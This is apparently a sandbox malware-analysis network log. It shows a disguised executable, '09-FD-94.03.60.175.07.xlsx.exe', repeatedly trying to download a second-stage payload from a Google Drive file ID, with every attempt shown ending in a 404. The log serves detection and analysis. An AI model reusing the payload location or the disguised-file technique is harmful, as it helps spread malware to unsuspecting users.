                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:13 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC79_XdwT5opJ7bv4SRS37aV6-L-mz42raFK0BeUYM8LjL7jm78EHlmU9VntEIdrP7Cc
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:12 GMT
                                                        Content-Security-Policy: script-src 'nonce-_xJZkHHIdz5WlfP4Ganjkw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:13 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 55 47 33 51 58 47 4f 65 4e 64 35 74 77 7a 59 37 42 59 6c 6e 75 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="UG3QXGOeNd5twzY7BYlnug">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        12192.168.2.849722172.217.19.174443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:14 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:15 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:15 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Content-Security-Policy: script-src 'nonce-hRkaLRfWx3m2o081ssvlAQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        13192.168.2.849724142.250.181.1443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:17 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:18 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC5lQPyB7BU66PM55OBj_X1vNiIetanHmA_JKuIcORGptSgHDW3qjNXQLp3lOXEUkgVC
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:18 GMT
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-B6wP_cAUUif2MF-q9-axJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:18 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 46 70 64 52 55 36 67 63 57 6d 31 50 71 59 54 6e 76 5a 61 33 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="0FpdRU6gcWm1PqYTnvZa3A">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        14192.168.2.849725172.217.19.174443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:20 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:21 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:20 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-5RFiIBl9iY2pPwi3cpS7KQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        15192.168.2.849726142.250.181.1443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:23 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:24 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC5gplIk9aWtG2OizbMSZcYAmX3WVFDwhzKVatQHPnAMmpshVwSPhaPN4dm47Ju49C0u
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:23 GMT
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: script-src 'nonce-CpXKikGZJSW4-Nslu1zAIw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:24 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 38 69 32 57 4a 37 4b 67 48 6b 47 79 6b 66 7a 48 65 42 6e 51 6f 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="8i2WJ7KgHkGykfzHeBnQoQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        16192.168.2.849727172.217.19.174443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:25 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:26 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:26 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce--NRMrTAixhA4UXnXz4Haww' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Server: ESF
                                                        Content-Length: 0
                                                        X-XSS-Protection: 0
                                                        X-Frame-Options: SAMEORIGIN
                                                        X-Content-Type-Options: nosniff
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Connection: close


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        17192.168.2.849728142.250.181.1443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:28 UTC459OUTGET /download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Cache-Control: no-cache
                                                        Host: drive.usercontent.google.com
                                                        Connection: Keep-Alive
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:29 UTC1844INHTTP/1.1 404 Not Found
                                                        X-GUploader-UploadID: AFiumC5yshGBTP9KYwDoCluf2c407DFNsdUYXeuPHVLetEdD71YMf886mgV2_nGeWrbN7AZt
                                                        Content-Type: text/html; charset=utf-8
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:29 GMT
                                                        Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Cross-Origin-Opener-Policy: same-origin
                                                        Content-Security-Policy: script-src 'nonce-IRKCx1nAUszw3Y4rLk3B_Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                        Content-Length: 1652
                                                        Server: UploadServer
                                                        Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                        Content-Security-Policy: sandbox allow-scripts
                                                        Connection: close
                                                        2024-12-16 16:58:29 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 46 32 76 66 5a 49 47 76 37 58 59 6a 51 2d 4a 59 52 77 47 5a 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                        Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yF2vfZIGv7XYjQ-JYRwGZQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        18192.168.2.849730172.217.19.174443928C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                        TimestampBytes transferredDirectionData
                                                        2024-12-16 16:58:31 UTC417OUTGET /uc?export=download&id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i HTTP/1.1
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                        Host: drive.google.com
                                                        Cache-Control: no-cache
                                                        Cookie: NID=520=ZwL-I7SetfSMGBD8dxKSDpfj6J25jQmV4_fEN53NNck3DthapVw0xwfiwRVGhZV8ER93tIDsD5LdoUoq9oVqUFpQx0ELxtX6Ocm5U1rZRiUYOvoJZ-8eyM2ImpeUymGYMmJ1_feb419w_l98Xa4jeNXt-GB_FQO4kaeHkAfIEI0K4ubqae0VHGY
                                                        2024-12-16 16:58:32 UTC1920INHTTP/1.1 303 See Other
                                                        Content-Type: application/binary
                                                        Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                        Pragma: no-cache
                                                        Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                        Date: Mon, 16 Dec 2024 16:58:31 GMT
                                                        Location: https://drive.usercontent.google.com/download?id=1DRkxV8s5WKEflhLbDqRIq1CtXsroj69i&export=download
                                                        Strict-Transport-Security: max-age=31536000
                                                        Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                        Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                        Content-Security-Policy: script-src 'nonce-KPfjUvOvnpPJmW8aTNlIeg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                        Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
